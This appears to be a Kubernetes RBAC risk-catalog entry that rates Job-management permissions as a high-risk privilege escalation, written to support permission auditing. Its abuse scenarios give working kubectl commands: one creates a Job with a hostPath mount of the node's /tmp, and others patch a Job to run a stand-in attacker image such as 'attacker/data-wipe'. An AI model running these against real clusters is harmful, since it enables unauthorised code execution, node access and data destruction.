Manage Jobs in a namespace (one-off privileged execution)
Elevation of Privilege
High
Overview
| Field | Value |
|---|---|
| ID | 1042 |
| Name | Manage Jobs in a namespace (one-off privileged execution) |
| Risk Category | Elevation of Privilege |
| Risk Level | High |
| Role Type | Role |
| API Groups | batch |
| Resources | jobs |
| Verbs | create, update, patch, delete |
| Tags | PotentialPrivilegeEscalation Tampering WorkloadLifecycle |
Description
Permits creating, updating, or deleting Jobs within a specific namespace. This can be used to run a one-off pod, potentially with privileged settings, leading to code execution and potential privilege escalation within that namespace.
Abuse Scenarios
- Create a new Job with a hostPath mount in the namespace.
kubectl create -n <namespace> -f - <<EOF
apiVersion: batch/v1
kind: Job
metadata:
name: hostpath-job
spec:
template:
spec:
containers:
- name: hostpath-container
image: busybox
command: ["/bin/sh", "-c", "echo 'Hello from job' >> /host-tmp/job.log"]
volumeMounts:
- mountPath: /host-tmp
name: host-tmp
volumes:
- name: host-tmp
hostPath:
path: /tmp
restartPolicy: OnFailure
EOF
# Example: kubectl create -n default -f - <<EOF ... EOF
- Update an existing Job’s image to a malicious one.
kubectl patch job <job-name> -n <namespace> --type='json' -p='[{"op": "replace", "path": "/spec/template/spec/containers/0/image", "value": "attacker/malicious-script"}]'
# Example: kubectl patch job cleanup-old-data -n production --type='json' -p='[{"op": "replace", "path": "/spec/template/spec/containers/0/image", "value": "attacker/data-wipe"}]'